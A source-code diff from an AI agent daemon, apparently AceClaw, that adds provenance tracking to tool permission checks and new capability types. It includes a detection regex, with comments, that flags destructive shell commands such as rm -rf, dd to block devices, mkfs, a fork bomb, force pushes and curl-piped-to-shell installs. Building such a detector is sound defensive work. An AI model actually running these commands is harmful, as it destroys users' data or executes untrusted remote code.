+                requestTools, cancelContext, sessionId, eventHandler, promptId);
 
         // Get or create a session-scoped metrics collector so tool stats accumulate across turns
         var metricsCollector = sessionMetrics.computeIfAbsent(sessionId, _ -> new ToolMetricsCollector());
@@ -1650,11 +1657,21 @@ public final class StreamingAgentHandler {
             List<Tool> requestTools,
             CancelAwareStreamContext context,
             String sessionId,
-            StreamEventHandler eventHandler) {
+            StreamEventHandler eventHandler,
+            dev.aceclaw.security.ids.PromptId promptId) {
         Objects.requireNonNull(context, "context");
         Objects.requireNonNull(sessionId, "sessionId");
         Objects.requireNonNull(eventHandler, "eventHandler");
         Objects.requireNonNull(requestTools, "requestTools");
+        Objects.requireNonNull(promptId, "promptId");
+        // The current step id is held in StreamingNotificationHandler's
+        // AtomicReference; the supplier reads through it lazily so a tool
+        // call captures whichever step is active at the moment of the
+        // permission check (not the moment the registry was constructed).
+        java.util.function.Supplier<String> currentStepIdSupplier =
+                (eventHandler instanceof StreamingNotificationHandler snh)
+                        ? snh::getCurrentStepId
+                        : () -> null;
         var registry = new ToolRegistry();
         var antiPatternGate = AntiPatternPreExecutionGate.fromStores(
                 memoryStore,
@@ -1681,7 +1698,9 @@ public final class StreamingAgentHandler {
                     () -> getAntiPatternGateOverride(sessionId, effectiveTool.name()),
                     antiPatternGateFeedbackStore,
                     candidateStore,
-                    runtimeMetricsExporter));
+                    runtimeMetricsExporter,
+                    promptId,
+                    currentStepIdSupplier));
         }
         return registry;
     }
@@ -3399,6 +3418,16 @@ public final class StreamingAgentHandler {
             currentStepId.set(stepId);
         }
 
+        /**
+         * Returns the currently active plan step id, or {@code null} if no
+         * plan is in progress. Exposed so {@link PermissionAwareTool} can
+         * stamp the per-call {@link dev.aceclaw.security.Provenance} with
+         * the step that triggered each capability check (#480 PR 3).
+         */
+        String getCurrentStepId() {
+            return currentStepId.get();
+        }
+
         @Override
         public void onThinkingDelta(StreamEvent.ThinkingDelta event) {
             try {
@@ -3956,6 +3985,13 @@ public final class StreamingAgentHandler {
         private final AntiPatternGateFeedbackStore antiPatternGateFeedbackStore;
         private final CandidateStore candidateStore;
         private final RuntimeMetricsExporter metricsExporter;
+        // #480 PR 3: Provenance-chain inputs. {@code promptId} is per-request
+        // (constant across all tool calls in this prompt); the step-id
+        // supplier is read lazily on each tool call so it captures the plan
+        // step that's active at the moment of the permission check, not the
+        // step that was active when the registry was constructed.
+        private final dev.aceclaw.security.ids.PromptId promptId;
+        private final java.util.function.Supplier<String> currentStepIdSupplier;
 
         PermissionAwareTool(Tool delegate, PermissionManager permissionManager,
                             CancelAwareStreamContext context, ObjectMapper objectMapper,
@@ -3964,7 +4000,9 @@ public final class StreamingAgentHandler {
                             java.util.function.Supplier<AntiPatternGateOverrideStatus> antiPatternOverrideSupplier,
                             AntiPatternGateFeedbackStore antiPatternGateFeedbackStore,
                             CandidateStore candidateStore,
-                            RuntimeMetricsExporter metricsExporter) {
+                            RuntimeMetricsExporter metricsExporter,
+                            dev.aceclaw.security.ids.PromptId promptId,
+                            java.util.function.Supplier<String> currentStepIdSupplier) {
             this.delegate = delegate;
             this.permissionManager = permissionManager;
             this.context = context;
@@ -3977,6 +4015,8 @@ public final class StreamingAgentHandler {
             this.antiPatternGateFeedbackStore = antiPatternGateFeedbackStore;
             this.candidateStore = candidateStore;
             this.metricsExporter = metricsExporter;
+            this.promptId = Objects.requireNonNull(promptId, "promptId");
+            this.currentStepIdSupplier = Objects.requireNonNull(currentStepIdSupplier, "currentStepIdSupplier");
         }
 
         @Override
@@ -4049,8 +4089,25 @@ public final class StreamingAgentHandler {
             // CapabilityAware tools take the structured path; everything else
             // hits the legacy PermissionRequest entry point. Both ultimately
             // share PermissionManager's single decision/audit pipeline.
+            //
+            // #480 PR 3: build the full Provenance here so the structured
+            // path receives the actual rootPrompt and (when running inside a
+            // plan) the active planStepId. The supplier read lazily picks up
+            // whatever step is current at this exact moment — sequencing
+            // matters because a single agent.prompt can transition through
+            // multiple plan steps.
+            var stepIdRaw = currentStepIdSupplier.get();
+            var provenance = new dev.aceclaw.security.Provenance(
+                    java.util.Optional.of(promptId),
+                    java.util.Optional.of(new dev.aceclaw.security.ids.SessionId(sessionId)),
+                    stepIdRaw == null
+                            ? java.util.Optional.<dev.aceclaw.security.ids.PlanStepId>empty()
+                            : java.util.Optional.of(new dev.aceclaw.security.ids.PlanStepId(stepIdRaw)),
+                    0,                          // subAgentDepth — top-level main loop
+                    java.util.List.of()         // chain — populated piecemeal in follow-ups
+            );
             var decision = ToolPermissionRouter.check(
-                    delegate, finalInputJson, sessionId, toolDescription, level,
+                    delegate, finalInputJson, provenance, toolDescription, level,
                     permissionManager, objectMapper);
             var overrideStatus = antiPatternOverrideSupplier != null
                     ? antiPatternOverrideSupplier.get()

--- a/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/ToolPermissionRouter.java
+++ b/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/ToolPermissionRouter.java
@@ -9,6 +9,7 @@ import dev.aceclaw.security.PermissionLevel;
 import dev.aceclaw.security.PermissionManager;
 import dev.aceclaw.security.PermissionRequest;
 import dev.aceclaw.security.Provenance;
+import dev.aceclaw.security.ids.SessionId;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -77,7 +78,37 @@ final class ToolPermissionRouter {
             PermissionLevel fallbackLevel,
             PermissionManager permissionManager,
             ObjectMapper mapper) {
+        // Legacy entry point — preserved for tests and any caller that does
+        // not yet have a richer Provenance to thread. Builds the minimum
+        // Provenance from sessionId only and delegates to the structured form.
+        return check(delegate, inputJson, Provenance.fromNullableSessionId(sessionId),
+                description, fallbackLevel, permissionManager, mapper);
+    }
+
+    /**
+     * Structured-Provenance entry point introduced by #480 PR 3. Caller is
+     * responsible for building the {@link Provenance} with whatever fields
+     * it has in scope — typically {@link Provenance#rootPrompt()} from the
+     * {@code agent.prompt} entry point and {@link Provenance#planStepId()}
+     * from the planner's per-step context. This is what makes
+     * {@link Provenance}'s optional fields stop being empty.
+     *
+     * <p>The legacy 7-arg overload above remains, building the minimal
+     * Provenance from sessionId alone, so existing callers and tests stay
+     * compiling unchanged.
+     *
+     * @param provenance the full provenance chain context for this check
+     */
+    static PermissionDecision check(
+            Tool delegate,
+            String inputJson,
+            Provenance provenance,
+            String description,
+            PermissionLevel fallbackLevel,
+            PermissionManager permissionManager,
+            ObjectMapper mapper) {
         Objects.requireNonNull(delegate, "delegate");
+        Objects.requireNonNull(provenance, "provenance");
         Objects.requireNonNull(description, "description");
         Objects.requireNonNull(fallbackLevel, "fallbackLevel");
         Objects.requireNonNull(permissionManager, "permissionManager");
@@ -87,6 +118,8 @@ final class ToolPermissionRouter {
         // missing/invalid arguments and the dispatcher previously absorbed
         // them in the try-catch below. Hard-failing here would convert a
         // recoverable flow into an unhandled crash. (Codex review on #482.)
+
+        String sessionId = provenance.sessionId().map(SessionId::value).orElse(null);
 
         if (!(delegate instanceof CapabilityAware capAware)) {
             return checkLegacy(delegate, description, fallbackLevel, sessionId, permissionManager);
@@ -108,7 +141,6 @@ final class ToolPermissionRouter {
                     "CapabilityAware tool " + delegate.name()
                             + " returned null capability (contract violation)");
         }
-        var provenance = Provenance.fromNullableSessionId(sessionId);
         return permissionManager.check(capability, provenance, delegate.name(), description);
     }
 

--- a/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/cron/CronPermissionChecker.java
+++ b/aceclaw-daemon/src/main/java/dev/aceclaw/daemon/cron/CronPermissionChecker.java
@@ -42,7 +42,12 @@ public final class CronPermissionChecker implements ToolPermissionChecker {
     }
 
     @Override
-    public ToolPermissionResult check(String toolName, String inputJson) {
+    public ToolPermissionResult check(String toolName, String inputJson, String sessionId) {
+        // Cron execution has no user-facing session — sessionId is null
+        // and ignored. Cron's allow-list is per-job, not per-session, and
+        // the per-session leak that motivated #457 doesn't apply here
+        // (cron jobs are not interactive and never request session
+        // approval through the daemon's blanket-allow path).
         if (READ_ONLY_TOOLS.contains(toolName) || allowedTools.contains(toolName)) {
             return ToolPermissionResult.ALLOWED;
         }

--- a/aceclaw-daemon/src/test/java/dev/aceclaw/daemon/BackgroundTaskIntegrationTest.java
+++ b/aceclaw-daemon/src/test/java/dev/aceclaw/daemon/BackgroundTaskIntegrationTest.java
@@ -80,7 +80,7 @@ class BackgroundTaskIntegrationTest {
         var agentTypeRegistry = AgentTypeRegistry.withBuiltins();
         var readOnlyTools = java.util.Set.of("read_file", "glob", "grep");
         var subAgentPermChecker = new SubAgentPermissionChecker(
-                readOnlyTools, permissionManager::hasAnySessionApproval);
+                readOnlyTools, permissionManager::hasSessionApproval);
         var subAgentRunner = new SubAgentRunner(
                 mockLlm, toolRegistry, "mock-model", workDir, 4096, 0,
                 subAgentPermChecker, null);

--- a/aceclaw-daemon/src/test/java/dev/aceclaw/daemon/SubAgentIntegrationTest.java
+++ b/aceclaw-daemon/src/test/java/dev/aceclaw/daemon/SubAgentIntegrationTest.java
@@ -84,7 +84,7 @@ class SubAgentIntegrationTest {
         var agentTypeRegistry = AgentTypeRegistry.withBuiltins();
         var readOnlyTools = java.util.Set.of("read_file", "glob", "grep");
         var subAgentPermChecker = new SubAgentPermissionChecker(
-                readOnlyTools, permissionManager::hasAnySessionApproval);
+                readOnlyTools, permissionManager::hasSessionApproval);
         var subAgentRunner = new SubAgentRunner(
                 mockLlm, toolRegistry, "mock-model", workDir, 4096, 0,
                 subAgentPermChecker, null);

--- a/aceclaw-daemon/src/test/java/dev/aceclaw/daemon/ToolPermissionRouterTest.java
+++ b/aceclaw-daemon/src/test/java/dev/aceclaw/daemon/ToolPermissionRouterTest.java
@@ -225,13 +225,16 @@ final class ToolPermissionRouterTest {
         var policy = new CapturingPolicy();
         var pm = new PermissionManager(policy);
 
+        // Cast null to String to disambiguate from the structured-Provenance
+        // overload added in #480 PR 3 — both 7-arg shapes accept a null
+        // 3rd arg by type, so the compiler can't pick one without help.
         ToolPermissionRouter.check(
-                new SpyCapabilityAwareTool(), "{}", null, "no session",
+                new SpyCapabilityAwareTool(), "{}", (String) null, "no session",
                 PermissionLevel.WRITE, pm, MAPPER);
         assertThat(policy.last.get().toolName()).isEqualTo("spy_tool");
 
         ToolPermissionRouter.check(
-                new LegacyOnlyTool(), "{}", null, "no session",
+                new LegacyOnlyTool(), "{}", (String) null, "no session",
                 PermissionLevel.READ, pm, MAPPER);
         assertThat(policy.last.get().toolName()).isEqualTo("legacy_tool");
     }

--- a/aceclaw-security/build.gradle.kts
+++ b/aceclaw-security/build.gradle.kts
@@ -4,6 +4,8 @@ dependencies {
     implementation(project(":aceclaw-core"))
 
     implementation("com.fasterxml.jackson.core:jackson-databind")
+    implementation("com.fasterxml.jackson.core:jackson-annotations")
     implementation("com.fasterxml.jackson.datatype:jackson-datatype-jsr310")
+    implementation("com.fasterxml.jackson.datatype:jackson-datatype-jdk8")
     implementation("org.slf4j:slf4j-api")
 }

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/Capability.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/Capability.java
@@ -1,10 +1,14 @@
 package dev.aceclaw.security;
 
+import com.fasterxml.jackson.annotation.JsonSubTypes;
+import com.fasterxml.jackson.annotation.JsonTypeInfo;
 import dev.aceclaw.security.ids.MemoryKey;
 
 import java.net.URI;
 import java.nio.file.Path;
 import java.util.Objects;
+import java.util.Optional;
+import java.util.regex.Pattern;
 
 /**
  * One concrete capability the agent loop wants to use, in a shape that makes
@@ -39,10 +43,12 @@ import java.util.Objects;
  * <h3>{@link #risk()} is derived, not declared</h3>
  *
  * Callers cannot lie about a capability's risk class. {@link FileRead} is
- * always {@code READ}; {@link BashExec} is {@code EXECUTE} (PR-1 baseline);
- * future patch will let {@code BashExec} self-escalate to {@code DANGEROUS}
- * for known destructive patterns. Either way, the escalation lives in the
- * variant — not at the call site.
+ * always {@code READ}; {@link BashExec} is {@code EXECUTE} for benign
+ * commands and self-escalates to {@code DANGEROUS} for known-destructive
+ * patterns ({@code rm -rf}, {@code mkfs}, {@code git push --force}, etc.).
+ * The escalation lives in the variant, not at the call site, so every
+ * surface — audit log, dashboard label, user prompt — agrees about which
+ * commands are dangerous without each one re-implementing the rule set.
  *
  * <h3>{@link LegacyToolUse}</h3>
  *
@@ -51,6 +57,24 @@ import java.util.Objects;
  * present so the legacy deserializer has a {@code Capability} variant to
  * land on.
  */
+@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "kind")
+@JsonSubTypes({
+        @JsonSubTypes.Type(value = Capability.FileRead.class, name = "FileRead"),
+        @JsonSubTypes.Type(value = Capability.FileWrite.class, name = "FileWrite"),
+        @JsonSubTypes.Type(value = Capability.FileDelete.class, name = "FileDelete"),
+        @JsonSubTypes.Type(value = Capability.FileSearch.class, name = "FileSearch"),
+        @JsonSubTypes.Type(value = Capability.BashExec.class, name = "BashExec"),
+        @JsonSubTypes.Type(value = Capability.OsScript.class, name = "OsScript"),
+        @JsonSubTypes.Type(value = Capability.BrowserAction.class, name = "BrowserAction"),
+        @JsonSubTypes.Type(value = Capability.ScreenCapture.class, name = "ScreenCapture"),
+        @JsonSubTypes.Type(value = Capability.SkillInvoke.class, name = "SkillInvoke"),
+        @JsonSubTypes.Type(value = Capability.HttpFetch.class, name = "HttpFetch"),
+        @JsonSubTypes.Type(value = Capability.McpInvoke.class, name = "McpInvoke"),
+        @JsonSubTypes.Type(value = Capability.MemoryWrite.class, name = "MemoryWrite"),
+        @JsonSubTypes.Type(value = Capability.MemoryRead.class, name = "MemoryRead"),
+        @JsonSubTypes.Type(value = Capability.SubAgentSpawn.class, name = "SubAgentSpawn"),
+        @JsonSubTypes.Type(value = Capability.LegacyToolUse.class, name = "LegacyToolUse"),
+})
 public sealed interface Capability {
 
     /**
@@ -149,23 +173,173 @@ public sealed interface Capability {
         @Override public String displayLabel() { return "delete " + renderPath(path); }
     }
 
+    // -- Filesystem search ----------------------------------------------
+
+    /**
+     * Search-the-filesystem capability used by {@code glob}, {@code grep},
+     * and {@code list_directory}. Distinguishing them as a typed
+     * {@link SearchKind} (not three separate variants) means policies can
+     * write "deny all FileSearch in /etc" once instead of three times, while
+     * still letting a tighter rule say "deny GREP specifically because it
+     * reads file content."
+     *
+     * <p>Risk is {@code READ} for every kind: search semantically discloses
+     * filesystem state to the agent, which is INGRESS. {@code GREP} reads
+     * file bytes — heavier than {@code GLOB} or {@code LIST} which only see
+     * names — but PolicyEngine (#465 Scope #2) is the place to encode that
+     * difference, not the variant's flat risk class.
+     */
+    record FileSearch(Path root, String pattern, SearchKind kind) implements Capability {
+        public FileSearch {
+            Objects.requireNonNull(root, "root");
+            Objects.requireNonNull(pattern, "pattern");
+            Objects.requireNonNull(kind, "kind");
+        }
+
+        @Override public PermissionLevel risk() { return PermissionLevel.READ; }
+        @Override public DataFlow dataFlow() { return DataFlow.INGRESS; }
+        @Override public String displayLabel() {
+            return switch (kind) {
+                case GLOB -> "glob " + pattern + " in " + renderPath(root);
+                case GREP -> "grep " + pattern + " in " + renderPath(root);
+                case LIST -> "list " + renderPath(root);
+            };
+        }
+    }
+
     // -- Process --------------------------------------------------------
 
     /**
-     * Shell command execution. {@link #risk()} returns {@code EXECUTE} in
-     * this PR; #465 Scope #2 (PolicyEngine) is where DANGEROUS escalation
-     * for destructive command patterns will live, so the rule set is in
-     * one place rather than scattered across capability variants.
+     * Shell command execution. {@link #risk()} returns {@code EXECUTE} for
+     * normal commands and self-escalates to {@code DANGEROUS} when the
+     * command matches a known-destructive pattern (e.g. {@code rm -rf},
+     * {@code dd}, {@code mkfs}, {@code :(){ :|:& };:}, fork bombs).
+     *
+     * <p>The escalation lives in the variant rather than in PolicyEngine
+     * because the rule is structural ("any rm -rf is dangerous") rather
+     * than policy ("our org's rule about rm-rf"); centralising it here
+     * means audit-log readers, dashboard event labels, and the user prompt
+     * all see {@code DANGEROUS} for the same set of commands without each
+     * surface re-implementing the detection.
+     *
+     * <p>{@link #DESTRUCTIVE_PATTERN} is intentionally conservative — false
+     * negatives (a destructive command not flagged) fall back to the
+     * standard {@code EXECUTE} prompt, which is the same answer the user
+     * would have got pre-#480. False positives ({@code DANGEROUS} on a
+     * benign-looking command) just produce one extra prompt; no one loses
+     * data.
      */
     record BashExec(String command, Path cwd) implements Capability {
+
+        /**
+         * Destructive command patterns that escalate this capability's
+         * {@link #risk()} from {@code EXECUTE} to {@code DANGEROUS}. Order
+         * matters only for readability — the matcher only checks for any
+         * match. Patterns target the most common irrecoverable destruction
+         * vectors:
+         *
+         * <ul>
+         *   <li>{@code rm -rf} / {@code rm -fr} — recursive force delete.
+         *       Single dash, double dash, and combined flags all match.</li>
+         *   <li>{@code sudo rm} — privileged delete (even non-recursive
+         *       sudo rm is irreversible at the privilege boundary).</li>
+         *   <li>{@code dd} writing to a block device — wipes drives.</li>
+         *   <li>{@code mkfs} / {@code mke2fs} — filesystem (re)creation.</li>
+         *   <li>{@code shred} / {@code wipe} — secure-erase utilities.</li>
+         *   <li>{@code chmod -R 000} / {@code chown -R} on root paths —
+         *       lockout patterns.</li>
+         *   <li>Fork bomb {@code :(){ :|:& };:} — DoS the host.</li>
+         *   <li>{@code git push --force} / {@code git push -f} on a non-
+         *       feature ref — destroys upstream history. The pattern
+         *       intentionally matches both forms; PolicyEngine can later
+         *       relax this for feature branches.</li>
+         *   <li>{@code git reset --hard} — discards uncommitted work.</li>
+         *   <li>{@code curl ... | sh} / {@code wget ... | sh} — pipe-to-shell
+         *       installs run arbitrary remote code unprivilegedly. Flagged
+         *       as destructive because the agent cannot verify what's on
+         *       the other side of the URL.</li>
+         * </ul>
+         *
+         * <p>Whitespace tolerance: the regex uses {@code \s+} so flag
+         * combinations like {@code rm   -rf} or {@code rm\t-rf} match.
+         * {@code (?i)} is intentionally NOT applied — Unix command names
+         * are case-sensitive and {@code RM} is not a real binary; matching
+         * case-insensitively would invite trivial bypass theatrics that
+         * give a false sense of coverage.
+         */
+        private static final Pattern DESTRUCTIVE_PATTERN = Pattern.compile(
+                "(?:^|[\\s;&|`(])(?:" +
+                        // rm: command name is case-sensitive (RM is not a real binary), but
+                        // flag letters can be either case — BSD's recursive flag is -R, GNU's
+                        // is -r. We must match both or rm -Rf bypasses the rule.
+                        "rm\\s+(?:-[a-zA-Z]*[rR][a-zA-Z]*[fF][a-zA-Z]*|-[a-zA-Z]*[fF][a-zA-Z]*[rR][a-zA-Z]*|--recursive\\s+--force|--force\\s+--recursive)" +
+                        "|sudo\\s+rm" +
+                        "|dd\\s+[^|]*of=/dev/" +
+                        "|mkfs(?:\\.[a-z0-9]+)?\\s" +
+                        "|mke2fs\\s" +
+                        "|shred\\s" +
+                        "|\\bwipe\\s+-" +
+                        "|chmod\\s+-R\\s+0?00\\s+/" +
+                        "|chown\\s+-R\\s+[^/]+/(?:\\s|$)" +
+                        "|:\\(\\)\\s*\\{\\s*:\\|:&\\s*\\}\\s*;:" +
+                        "|git\\s+push\\s+(?:-f\\b|--force\\b)" +
+                        "|git\\s+reset\\s+--hard" +
+                        "|(?:curl|wget)\\s[^|]*\\|\\s*(?:sudo\\s+)?(?:bash|sh|zsh)\\b" +
+                        ")");
+
         public BashExec {
             Objects.requireNonNull(command, "command");
             Objects.requireNonNull(cwd, "cwd");
         }
 
+        /**
+         * Returns whether {@code command} matches a known-destructive pattern.
+         * Exposed package-private so {@code BashExecToolCapabilityTest} can
+         * exercise the rule set directly without round-tripping through a
+         * full capability instance.
+         */
+        static boolean isDestructive(String command) {
+            return command != null && DESTRUCTIVE_PATTERN.matcher(command).find();
+        }
+
+        @Override public PermissionLevel risk() {
+            return isDestructive(command) ? PermissionLevel.DANGEROUS : PermissionLevel.EXECUTE;
+        }
+        @Override public DataFlow dataFlow() { return DataFlow.BOTH; }
+        @Override public String displayLabel() {
+            return (isDestructive(command) ? "exec[DANGEROUS]: " : "exec: ") + command;
+        }
+    }
+
+    /**
+     * Host-OS scripting capability for languages other than the system
+     * shell — currently AppleScript on macOS. Modelled as its own variant
+     * (not as {@link BashExec}) so policies can ban {@code applescript}
+     * (which can drive arbitrary GUI apps and read clipboard / mail / etc.)
+     * without also banning {@code bash}, and so the audit log records the
+     * actual interpreter rather than wrapping everything in a fake bash
+     * label. Risk is {@code EXECUTE}; data-flow is {@code BOTH}.
+     */
+    record OsScript(String language, String source) implements Capability {
+        public OsScript {
+            Objects.requireNonNull(language, "language");
+            Objects.requireNonNull(source, "source");
+            if (language.isBlank()) {
+                throw new IllegalArgumentException("language must not be blank");
+            }
+        }
+
         @Override public PermissionLevel risk() { return PermissionLevel.EXECUTE; }
         @Override public DataFlow dataFlow() { return DataFlow.BOTH; }
-        @Override public String displayLabel() { return "exec: " + command; }
+        @Override public String displayLabel() {
+            // First line of the script gives the operator a hint without
+            // dumping a 200-line payload into the audit display.
+            int newline = source.indexOf('\n');
+            String firstLine = newline < 0 ? source : source.substring(0, newline);
+            return language + ": " + (firstLine.length() > 80
+                    ? firstLine.substring(0, 80) + "..."
+                    : firstLine);
+        }
     }
 
     // -- Network --------------------------------------------------------
@@ -192,6 +366,89 @@ public sealed interface Capability {
             return DataFlow.BOTH;
         }
         @Override public String displayLabel() { return method + " " + url; }
+    }
+
+    // -- Browser --------------------------------------------------------
+
+    /**
+     * Browser automation capability (Playwright / driven Chromium): navigate,
+     * click, type, screenshot, evaluate JS in the page. Risk is
+     * {@code EXECUTE} because the action vocabulary includes JS evaluation
+     * and arbitrary navigation, which can fetch and exfiltrate. {@code url}
+     * is {@link Optional#empty()} for actions that don't target a URL
+     * (e.g. {@code "click"}, {@code "screenshot"}); when present it lets
+     * policies whitelist domains.
+     *
+     * <p>Action vocabulary is intentionally a free string rather than an
+     * enum: the underlying browser library evolves, and the policy surface
+     * shouldn't have to ship a new enum value every time. PolicyEngine can
+     * pattern-match on {@code action.startsWith("evaluate")} etc.
+     */
+    record BrowserAction(String action, Optional<URI> url) implements Capability {
+        public BrowserAction {
+            Objects.requireNonNull(action, "action");
+            Objects.requireNonNull(url, "url");
+            if (action.isBlank()) {
+                throw new IllegalArgumentException("action must not be blank");
+            }
+        }
+
+        @Override public PermissionLevel risk() { return PermissionLevel.EXECUTE; }
+        @Override public DataFlow dataFlow() { return DataFlow.BOTH; }
+        @Override public String displayLabel() {
+            return url.map(u -> "browser " + action + " " + u)
+                      .orElseGet(() -> "browser " + action);
+        }
+    }
+
+    // -- Screen ---------------------------------------------------------
+
+    /**
+     * Screen-capture capability. Modelled as its own variant rather than
+     * folded into a generic "capture-from-host" so a privacy policy can
+     * deny {@code ScreenCapture} without also denying {@link FileRead}:
+     * screen contents include unrelated apps, notifications, and any
+     * sensitive material the operator happens to have visible. Risk is
+     * {@code READ} (data flows in to the agent), but the human display
+     * label flags the privacy character so dashboard readers see at a
+     * glance that this isn't a normal file read.
+     */
+    record ScreenCapture(String reason) implements Capability {
+        public ScreenCapture {
+            Objects.requireNonNull(reason, "reason");
+        }
+
+        @Override public PermissionLevel risk() { return PermissionLevel.READ; }
+        @Override public DataFlow dataFlow() { return DataFlow.INGRESS; }
+        @Override public String displayLabel() {
+            return reason.isBlank() ? "screen capture" : "screen capture: " + reason;
+        }
+    }
+
+    // -- Skill ----------------------------------------------------------
+
+    /**
+     * Invocation of a registered local skill (Claude Code's skill system).
+     * Distinct from {@link McpInvoke}: skills are versioned, in-process
+     * code units; MCP is an out-of-process server. A policy that wants to
+     * disable third-party MCP servers should not also disable first-party
+     * skills, and vice-versa.
+     *
+     * <p>Args are intentionally not stored — same reason as {@link McpInvoke}
+     * (size, secrets). PolicyEngine sees {@code skillName} and decides
+     * whether deeper inspection is required.
+     */
+    record SkillInvoke(String skillName) implements Capability {
+        public SkillInvoke {
+            Objects.requireNonNull(skillName, "skillName");
+            if (skillName.isBlank()) {
+                throw new IllegalArgumentException("skillName must not be blank");
+            }
+        }
+
+        @Override public PermissionLevel risk() { return PermissionLevel.EXECUTE; }
+        @Override public DataFlow dataFlow() { return DataFlow.BOTH; }
+        @Override public String displayLabel() { return "skill " + skillName; }
     }
 
     // -- MCP ------------------------------------------------------------

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/Capability.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/Capability.java
@@ -57,7 +57,17 @@ import java.util.regex.Pattern;
  * present so the legacy deserializer has a {@code Capability} variant to
  * land on.
  */
-@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "kind")
+// Type discriminator property MUST NOT collide with any variant's record
+// component name. Using "kind" (the obvious choice) collides with
+// FileSearch.kind (SearchKind enum) — Jackson then writes both keys with
+// the same JSON name, readTree() collapses duplicates last-wins, the
+// discriminator becomes "GLOB"/"GREP"/"LIST" instead of "FileSearch", and
+// every glob/grep/list_directory v2 audit entry fails to deserialize and
+// gets dropped from readVerified() — silent loss of an entire entry class.
+// "@type" is Jackson's idiomatic discriminator and unambiguous because
+// "@" is not a legal Java identifier prefix, so no future variant field
+// can collide.
+@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "@type")
 @JsonSubTypes({
         @JsonSubTypes.Type(value = Capability.FileRead.class, name = "FileRead"),
         @JsonSubTypes.Type(value = Capability.FileWrite.class, name = "FileWrite"),
@@ -272,7 +282,26 @@ public sealed interface Capability {
                         // rm: command name is case-sensitive (RM is not a real binary), but
                         // flag letters can be either case — BSD's recursive flag is -R, GNU's
                         // is -r. We must match both or rm -Rf bypasses the rule.
-                        "rm\\s+(?:-[a-zA-Z]*[rR][a-zA-Z]*[fF][a-zA-Z]*|-[a-zA-Z]*[fF][a-zA-Z]*[rR][a-zA-Z]*|--recursive\\s+--force|--force\\s+--recursive)" +
+                        //
+                        // Matches the four common spellings of recursive-force rm:
+                        //   1) combined short flags     rm -rf  rm -fr  rm -Rf  etc.
+                        //   2) separated short flags    rm -r -f  rm -f -r  rm -R -f  etc.
+                        //   3) long flags (both orders) rm --recursive --force / --force --recursive
+                        //   4) mixed                    rm -r --force / rm --recursive -f
+                        // Without (2)/(4) the pattern misses "rm -r -f /tmp/x" which is the
+                        // most common interactive form (CodeRabbit review on #491).
+                        "rm\\s+(?:" +
+                                "-[a-zA-Z]*[rR][a-zA-Z]*[fF][a-zA-Z]*" +                       // -rf, -Rf, -rfv …
+                                "|-[a-zA-Z]*[fF][a-zA-Z]*[rR][a-zA-Z]*" +                      // -fr, -fR …
+                                "|-[a-zA-Z]*[rR][a-zA-Z]*\\s+(?:[^-\\s]\\S*\\s+)?-[a-zA-Z]*[fF][a-zA-Z]*" + // -r ... -f
+                                "|-[a-zA-Z]*[fF][a-zA-Z]*\\s+(?:[^-\\s]\\S*\\s+)?-[a-zA-Z]*[rR][a-zA-Z]*" + // -f ... -r
+                                "|--recursive\\s+(?:[^-\\s]\\S*\\s+)?--force" +
+                                "|--force\\s+(?:[^-\\s]\\S*\\s+)?--recursive" +
+                                "|--recursive\\s+(?:[^-\\s]\\S*\\s+)?-[a-zA-Z]*[fF][a-zA-Z]*" + // --recursive ... -f
+                                "|--force\\s+(?:[^-\\s]\\S*\\s+)?-[a-zA-Z]*[rR][a-zA-Z]*" +    // --force ... -r
+                                "|-[a-zA-Z]*[rR][a-zA-Z]*\\s+--force" +                         // -r --force
+                                "|-[a-zA-Z]*[fF][a-zA-Z]*\\s+--recursive" +                     // -f --recursive
+                        ")" +
                         "|sudo\\s+rm" +
                         "|dd\\s+[^|]*of=/dev/" +
                         "|mkfs(?:\\.[a-z0-9]+)?\\s" +
@@ -282,7 +311,12 @@ public sealed interface Capability {
                         "|chmod\\s+-R\\s+0?00\\s+/" +
                         "|chown\\s+-R\\s+[^/]+/(?:\\s|$)" +
                         "|:\\(\\)\\s*\\{\\s*:\\|:&\\s*\\}\\s*;:" +
-                        "|git\\s+push\\s+(?:-f\\b|--force\\b)" +
+                        // git push --force in any position of the push command line, so
+                        // "git push origin --force" / "git push origin master -f" both
+                        // match (the most common spellings in practice). Original regex
+                        // required the flag immediately after "push", which missed
+                        // every remote-named form (CodeRabbit review on #491).
+                        "|git\\s+push\\b[^|;&\\n]*?\\s(?:-f\\b|--force\\b)" +
                         "|git\\s+reset\\s+--hard" +
                         "|(?:curl|wget)\\s[^|]*\\|\\s*(?:sudo\\s+)?(?:bash|sh|zsh)\\b" +
                         ")");
@@ -504,22 +538,27 @@ public sealed interface Capability {
 
     /**
      * Spawning a sub-agent is itself a capability, so the audit chain
-     * captures the moment of delegation. {@code parentDepth} is the
-     * spawning agent's depth — the new sub-agent runs at
-     * {@code parentDepth + 1}. Policies can refuse spawns past a depth.
+     * captures the moment of delegation.
+     *
+     * <p><strong>Why no {@code parentDepth} field:</strong> the spawning
+     * agent's depth is already authoritatively recorded by
+     * {@link Provenance#subAgentDepth()} on the same audit entry. Carrying
+     * a redundant copy on the variant is fine in principle, but only when
+     * it can be populated correctly — and at {@code TaskTool.toCapability}
+     * time we don't have a handle to the calling agent's depth, so the
+     * field would always be {@code 0} and disagree with Provenance for
+     * every nested spawn (CodeRabbit review on #491). One source of truth
+     * (Provenance) is better than two that contradict.
      */
-    record SubAgentSpawn(String role, int parentDepth) implements Capability {
+    record SubAgentSpawn(String role) implements Capability {
         public SubAgentSpawn {
             Objects.requireNonNull(role, "role");
-            if (parentDepth < 0) {
-                throw new IllegalArgumentException("parentDepth must be non-negative; got " + parentDepth);
-            }
         }
 
         @Override public PermissionLevel risk() { return PermissionLevel.EXECUTE; }
         @Override public DataFlow dataFlow() { return DataFlow.BOTH; }
         @Override public String displayLabel() {
-            return "spawn sub-agent role=" + role + " depth=" + (parentDepth + 1);
+            return "spawn sub-agent role=" + role;
         }
     }
 

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/PermissionManager.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/PermissionManager.java
